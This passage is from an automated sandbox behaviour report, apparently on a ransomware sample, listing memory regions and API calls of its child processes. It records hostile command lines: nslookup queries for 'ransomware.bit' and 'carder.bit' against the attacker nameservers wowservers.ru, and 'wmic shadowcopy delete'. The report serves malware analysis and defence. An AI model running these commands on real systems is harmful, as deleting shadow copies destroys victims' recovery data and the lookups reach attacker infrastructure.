Parent PID 0xef8 (c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x F28
0x F70
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000520000 0x00520000 0x0053ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x0052ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x00533fff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x00541fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x00540000 0x00544fff Memory Mapped File Readable False False False -
pagefile_0x0000000000550000 0x00550000 0x00563fff Pagefile Backed Memory Readable True False False -
private_0x0000000000570000 0x00570000 0x005affff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x005f3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000600000 0x00600000 0x00600fff Pagefile Backed Memory Readable True False False -
private_0x0000000000610000 0x00610000 0x00611fff Private Memory Readable, Writable True False False -
locale.nls 0x00620000 0x006ddfff Memory Mapped File Readable False False False -
private_0x00000000006e0000 0x006e0000 0x0071ffff Private Memory Readable, Writable True False False -
private_0x0000000000720000 0x00720000 0x0075ffff Private Memory Readable, Writable True False False -
imm32.dll 0x00760000 0x00789fff Memory Mapped File Readable False False False -
private_0x0000000000760000 0x00760000 0x00760fff Private Memory Readable, Writable True False False -
private_0x0000000000770000 0x00770000 0x00770fff Private Memory Readable, Writable True False False -
private_0x00000000007d0000 0x007d0000 0x007dffff Private Memory Readable, Writable True False False -
private_0x0000000000900000 0x00900000 0x0090ffff Private Memory Readable, Writable True False False -
private_0x00000000009c0000 0x009c0000 0x00abffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ac0000 0x00ac0000 0x00c47fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c50000 0x00c50000 0x00dd0fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00eb0000 0x00ec6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000ed0000 0x00ed0000 0x04ecffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004ed0000 0x04ed0000 0x062cffff Pagefile Backed Memory Readable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73f40000 0x73f4afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73f50000 0x73f62fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73f70000 0x73f85fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73f90000 0x73fa1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x741c0000 0x74205fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74210000 0x74217fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74380000 0x74403fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74410000 0x7445dfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74510000 0x74517fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74520000 0x7454ffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74870000 0x7488afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f4d0000 0x7f4d0000 0x7f5cffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f5d0000 0x7f5d0000 0x7f5f2fff Pagefile Backed Memory Readable True False False -
private_0x000000007f5f5000 0x7f5f5000 0x7f5f5fff Private Memory Readable, Writable True False False -
private_0x000000007f5f9000 0x7f5f9000 0x7f5fbfff Private Memory Readable, Writable True False False -
private_0x000000007f5fc000 0x7f5fc000 0x7f5fefff Private Memory Readable, Writable True False False -
private_0x000000007f5ff000 0x7f5ff000 0x7f5fffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xf28
9 24
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xeb0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 89.203.10.56, 94.249.60.127, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
File Write filename = STD_ERROR_HANDLE, size = 34 True 1
Fn
Data
Process #4: nslookup.exe
8 18
»
Information Value
ID #4
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup ransomware.bit ns2.wowservers.ru
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:56, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:03:40
OS Process Information
»
Information Value
PID 0x5c8
Parent PID 0xef8 (c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 634
0x C94
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000530000 0x00530000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x0053ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x00543fff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x00551fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x00550000 0x00554fff Memory Mapped File Readable False False False -
pagefile_0x0000000000560000 0x00560000 0x00573fff Pagefile Backed Memory Readable True False False -
private_0x0000000000580000 0x00580000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x005fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000600000 0x00600000 0x00603fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000610000 0x00610000 0x00610fff Pagefile Backed Memory Readable True False False -
private_0x0000000000620000 0x00620000 0x00621fff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
imm32.dll 0x00670000 0x00699fff Memory Mapped File Readable False False False -
private_0x0000000000670000 0x00670000 0x00670fff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x00680fff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x00693fff Private Memory Readable, Writable True False False -
private_0x00000000006a0000 0x006a0000 0x006affff Private Memory Readable, Writable True False False -
locale.nls 0x006b0000 0x0076dfff Memory Mapped File Readable False False False -
private_0x0000000000770000 0x00770000 0x007affff Private Memory Readable, Writable True False False -
private_0x00000000007b0000 0x007b0000 0x008affff Private Memory Readable, Writable True False False -
private_0x00000000009c0000 0x009c0000 0x009cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000009d0000 0x009d0000 0x00b57fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b60000 0x00b60000 0x00ce0fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00eb0000 0x00ec6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000ed0000 0x00ed0000 0x04ecffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004ed0000 0x04ed0000 0x062cffff Pagefile Backed Memory Readable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73f40000 0x73f4afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73f50000 0x73f62fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73f70000 0x73f85fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73f90000 0x73fa1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x741c0000 0x74205fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74210000 0x74217fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74380000 0x74403fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74410000 0x7445dfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74510000 0x74517fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74520000 0x7454ffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74870000 0x7488afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efa0000 0x7efa0000 0x7f09ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f0a0000 0x7f0a0000 0x7f0c2fff Pagefile Backed Memory Readable True False False -
private_0x000000007f0c6000 0x7f0c6000 0x7f0c8fff Private Memory Readable, Writable True False False -
private_0x000000007f0c9000 0x7f0c9000 0x7f0c9fff Private Memory Readable, Writable True False False -
private_0x000000007f0cc000 0x7f0cc000 0x7f0cefff Private Memory Readable, Writable True False False -
private_0x000000007f0cf000 0x7f0cf000 0x7f0cffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0x634
8 18
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xeb0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns2.wowservers.ru, address_out = 94.249.60.127, 189.75.183.21, 89.203.10.56 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 32, size_out = 32 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 192 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 32, size_out = 32 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 706 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #6: nslookup.exe
8 23
»
Information Value
ID #6
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:02:55
OS Process Information
»
Information Value
PID 0xcb8
Parent PID 0xef8 (c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x CBC
0x BD8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000009c0000 0x009c0000 0x009dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000009c0000 0x009c0000 0x009cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000009d0000 0x009d0000 0x009d3fff Private Memory Readable, Writable True False False -
private_0x00000000009e0000 0x009e0000 0x009e1fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x009e0000 0x009e4fff Memory Mapped File Readable False False False -
pagefile_0x00000000009f0000 0x009f0000 0x00a03fff Pagefile Backed Memory Readable True False False -
private_0x0000000000a10000 0x00a10000 0x00a4ffff Private Memory Readable, Writable True False False -
private_0x0000000000a50000 0x00a50000 0x00a8ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000a90000 0x00a90000 0x00a93fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000aa0000 0x00aa0000 0x00aa0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000ab0000 0x00ab0000 0x00ab1fff Private Memory Readable, Writable True False False -
private_0x0000000000ac0000 0x00ac0000 0x00ac0fff Private Memory Readable, Writable True False False -
private_0x0000000000ad0000 0x00ad0000 0x00adffff Private Memory Readable, Writable True False False -
locale.nls 0x00ae0000 0x00b9dfff Memory Mapped File Readable False False False -
private_0x0000000000ba0000 0x00ba0000 0x00bdffff Private Memory Readable, Writable True False False -
private_0x0000000000be0000 0x00be0000 0x00c1ffff Private Memory Readable, Writable True False False -
imm32.dll 0x00c20000 0x00c49fff Memory Mapped File Readable False False False -
private_0x0000000000c20000 0x00c20000 0x00c20fff Private Memory Readable, Writable True False False -
private_0x0000000000c30000 0x00c30000 0x00c33fff Private Memory Readable, Writable True False False -
private_0x0000000000c50000 0x00c50000 0x00d4ffff Private Memory Readable, Writable True False False -
private_0x0000000000d90000 0x00d90000 0x00d9ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00eb0000 0x00ec6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000ed0000 0x00ed0000 0x04ecffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004ed0000 0x04ed0000 0x05057fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005060000 0x05060000 0x051e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000051f0000 0x051f0000 0x065effff Pagefile Backed Memory Readable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73f40000 0x73f4afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73f50000 0x73f62fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73f70000 0x73f85fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73f90000 0x73fa1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x741c0000 0x74205fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74210000 0x74217fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74380000 0x74403fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74410000 0x7445dfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74510000 0x74517fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74520000 0x7454ffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74870000 0x7488afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007ef20000 0x7ef20000 0x7f01ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f020000 0x7f020000 0x7f042fff Pagefile Backed Memory Readable True False False -
private_0x000000007f047000 0x7f047000 0x7f049fff Private Memory Readable, Writable True False False -
private_0x000000007f04a000 0x7f04a000 0x7f04afff Private Memory Readable, Writable True False False -
private_0x000000007f04c000 0x7f04c000 0x7f04efff Private Memory Readable, Writable True False False -
private_0x000000007f04f000 0x7f04f000 0x7f04ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xcbc
8 23
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xeb0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 89.203.10.56, 94.249.60.127, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 89.203.10.56, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #8: wmic.exe
16 0
»
Information Value
ID #8
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:53, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:02:43
OS Process Information
»
Information Value
PID 0x6ac
